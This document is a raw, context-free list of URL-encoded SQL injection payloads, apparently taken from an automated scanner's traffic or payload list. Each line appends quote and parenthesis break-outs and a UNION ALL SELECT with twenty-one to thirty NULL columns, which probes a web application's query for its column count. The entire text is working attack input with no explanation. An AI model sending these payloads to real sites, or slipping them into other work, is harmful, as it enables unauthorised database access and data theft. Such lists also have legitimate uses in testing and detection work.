1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 